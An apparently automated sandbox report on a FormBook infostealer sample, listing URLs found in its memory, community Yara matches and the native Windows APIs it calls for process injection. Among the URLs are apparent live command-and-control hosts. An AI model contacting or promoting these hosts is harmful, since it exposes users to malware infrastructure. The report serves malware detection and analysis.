35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6

Source: indent PWS-020199.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: indent PWS-020199.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: indent PWS-020199.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: indent PWS-020199.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2907687194.0000000005734000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.eylmpwjot.store
Source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2907687194.0000000005734000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.eylmpwjot.store/3mcu/
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: netiougc.exe, 00000007.00000002.2907131071.0000000004738000.00000004.10000000.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2906287952.0000000003998000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/
Source: netiougc.exe, 00000007.00000002.2907131071.0000000004738000.00000004.10000000.00040000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2906287952.0000000003998000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.searchvity.com/?dn=
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: indent PWS-020199.exe, 00000000.00000002.1683450101.00000000074D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: netiougc.exe, 00000007.00000002.2904358299.000000000331F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: netiougc.exe, 00000007.00000003.2203335794.0000000008185000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: indent PWS-020199.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: netiougc.exe, 00000007.00000002.2908750669.00000000081A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 0000000A.00000002.2311704116.0000000002776000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mareomnia.com/ya74/?dBOL8fg=

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Contains functionality to call native functions

Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0042B3B3 NtClose,	2_2_0042B3B3
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2B60 NtClose,LdrInitializeThunk,	2_2_014F2B60
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_014F2DF0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_014F2C70
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F35C0 NtCreateMutant,LdrInitializeThunk,	2_2_014F35C0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F4340 NtSetContextThread,	2_2_014F4340
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F4650 NtSuspendThread,	2_2_014F4650
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2BE0 NtQueryValueKey,	2_2_014F2BE0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2BF0 NtAllocateVirtualMemory,	2_2_014F2BF0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2B80 NtQueryInformationFile,	2_2_014F2B80
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2BA0 NtEnumerateValueKey,	2_2_014F2BA0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2AD0 NtReadFile,	2_2_014F2AD0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2AF0 NtWriteFile,	2_2_014F2AF0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2AB0 NtWaitForSingleObject,	2_2_014F2AB0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2D00 NtSetInformationFile,	2_2_014F2D00
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2D10 NtMapViewOfSection,	2_2_014F2D10
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2D30 NtUnmapViewOfSection,	2_2_014F2D30
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2DD0 NtDelayExecution,	2_2_014F2DD0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2DB0 NtEnumerateKey,	2_2_014F2DB0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2C60 NtCreateKey,	2_2_014F2C60
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2C00 NtQueryInformationProcess,	2_2_014F2C00
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2CC0 NtQueryVirtualMemory,	2_2_014F2CC0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2CF0 NtOpenProcess,	2_2_014F2CF0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2CA0 NtQueryInformationToken,	2_2_014F2CA0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2F60 NtCreateProcessEx,	2_2_014F2F60
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2F30 NtCreateSection,	2_2_014F2F30
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2FE0 NtCreateFile,	2_2_014F2FE0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2F90 NtProtectVirtualMemory,	2_2_014F2F90
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2FA0 NtQuerySection,	2_2_014F2FA0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2FB0 NtResumeThread,	2_2_014F2FB0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2E30 NtWriteVirtualMemory,	2_2_014F2E30
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2EE0 NtQueueApcThread,	2_2_014F2EE0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2E80 NtReadVirtualMemory,	2_2_014F2E80
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F2EA0 NtAdjustPrivilegesToken,	2_2_014F2EA0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F3010 NtOpenDirectoryObject,	2_2_014F3010
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F3090 NtSetValueKey,	2_2_014F3090
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F39B0 NtGetContextThread,	2_2_014F39B0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F3D70 NtOpenThread,	2_2_014F3D70
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F3D10 NtOpenProcessToken,	2_2_014F3D10
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A24340 NtSetContextThread,LdrInitializeThunk,	7_2_03A24340
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A24650 NtSuspendThread,LdrInitializeThunk,	7_2_03A24650
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_03A22BA0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_03A22BE0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_03A22BF0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22B60 NtClose,LdrInitializeThunk,	7_2_03A22B60
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22AF0 NtWriteFile,LdrInitializeThunk,	7_2_03A22AF0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22AD0 NtReadFile,LdrInitializeThunk,	7_2_03A22AD0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22FB0 NtResumeThread,LdrInitializeThunk,	7_2_03A22FB0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22FE0 NtCreateFile,LdrInitializeThunk,	7_2_03A22FE0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22F30 NtCreateSection,LdrInitializeThunk,	7_2_03A22F30
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_03A22E80
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_03A22EE0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03A22DF0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22DD0 NtDelayExecution,LdrInitializeThunk,	7_2_03A22DD0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_03A22D30
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_03A22D10
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_03A22CA0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22C60 NtCreateKey,LdrInitializeThunk,	7_2_03A22C60
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_03A22C70
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A235C0 NtCreateMutant,LdrInitializeThunk,	7_2_03A235C0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A239B0 NtGetContextThread,LdrInitializeThunk,	7_2_03A239B0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22B80 NtQueryInformationFile,	7_2_03A22B80
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22AB0 NtWaitForSingleObject,	7_2_03A22AB0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22FA0 NtQuerySection,	7_2_03A22FA0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22F90 NtProtectVirtualMemory,	7_2_03A22F90
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22F60 NtCreateProcessEx,	7_2_03A22F60
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22EA0 NtAdjustPrivilegesToken,	7_2_03A22EA0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22E30 NtWriteVirtualMemory,	7_2_03A22E30
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22DB0 NtEnumerateKey,	7_2_03A22DB0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22D00 NtSetInformationFile,	7_2_03A22D00
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22CF0 NtOpenProcess,	7_2_03A22CF0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22CC0 NtQueryVirtualMemory,	7_2_03A22CC0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A22C00 NtQueryInformationProcess,	7_2_03A22C00
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A23090 NtSetValueKey,	7_2_03A23090
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A23010 NtOpenDirectoryObject,	7_2_03A23010
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A23D10 NtOpenProcessToken,	7_2_03A23D10
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03A23D70 NtOpenThread,	7_2_03A23D70
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03238240 NtAllocateVirtualMemory,	7_2_03238240
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03238060 NtDeleteFile,	7_2_03238060
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_032380F0 NtClose,	7_2_032380F0
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03237F80 NtReadFile,	7_2_03237F80
Source: C:\Windows\SysWOW64\netiougc.exe	Code function: 7_2_03237E20 NtCreateFile,	7_2_03237E20

Detected potential crypto function

Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 0_2_01A1D444	0_2_01A1D444
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 0_2_03374FF8	0_2_03374FF8
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 0_2_03371668	0_2_03371668
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 0_2_03371658	0_2_03371658
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 0_2_03370D90	0_2_03370D90
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00403020	2_2_00403020
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00410083	2_2_00410083
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0040E103	2_2_0040E103
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00402190	2_2_00402190
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00401200	2_2_00401200
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00402AF0	2_2_00402AF0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00402320	2_2_00402320
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_00402550	2_2_00402550
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0040FE63	2_2_0040FE63
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0042D7F3	2_2_0042D7F3
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_004167F3	2_2_004167F3
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01548158	2_2_01548158
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014B0100	2_2_014B0100
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0155A118	2_2_0155A118
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_015781CC	2_2_015781CC
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_015801AA	2_2_015801AA
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_015741A2	2_2_015741A2
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01552000	2_2_01552000
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157A352	2_2_0157A352
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014CE3F0	2_2_014CE3F0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_015803E6	2_2_015803E6
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01560274	2_2_01560274
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_015402C0	2_2_015402C0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C0535	2_2_014C0535
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01580591	2_2_01580591
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01572446	2_2_01572446
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01564420	2_2_01564420
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0156E4F6	2_2_0156E4F6
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014E4750	2_2_014E4750
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C0770	2_2_014C0770
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014BC7C0	2_2_014BC7C0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014DC6E0	2_2_014DC6E0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014D6962	2_2_014D6962
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C29A0	2_2_014C29A0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0158A9A6	2_2_0158A9A6
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014CA840	2_2_014CA840
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C2840	2_2_014C2840
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014EE8F0	2_2_014EE8F0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014A68B8	2_2_014A68B8
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157AB40	2_2_0157AB40
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01576BD7	2_2_01576BD7
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014BEA80	2_2_014BEA80
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0155CD1F	2_2_0155CD1F
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014CAD00	2_2_014CAD00
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014BADE0	2_2_014BADE0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014D8DBF	2_2_014D8DBF
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C0C00	2_2_014C0C00
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014B0CF2	2_2_014B0CF2
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01560CB5	2_2_01560CB5
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01534F40	2_2_01534F40
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01562F30	2_2_01562F30
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_01502F28	2_2_01502F28
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014E0F30	2_2_014E0F30
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014B2FC8	2_2_014B2FC8
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0153EFA0	2_2_0153EFA0
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014C0E59	2_2_014C0E59
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157EE26	2_2_0157EE26
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157EEDB	2_2_0157EEDB
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0157CE93	2_2_0157CE93
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014D2E90	2_2_014D2E90
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014F516C	2_2_014F516C
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_0158B16B	2_2_0158B16B
Source: C:\Users\user\Desktop\indent PWS-020199.exe	Code function: 2_2_014AF172	2_2_014AF172
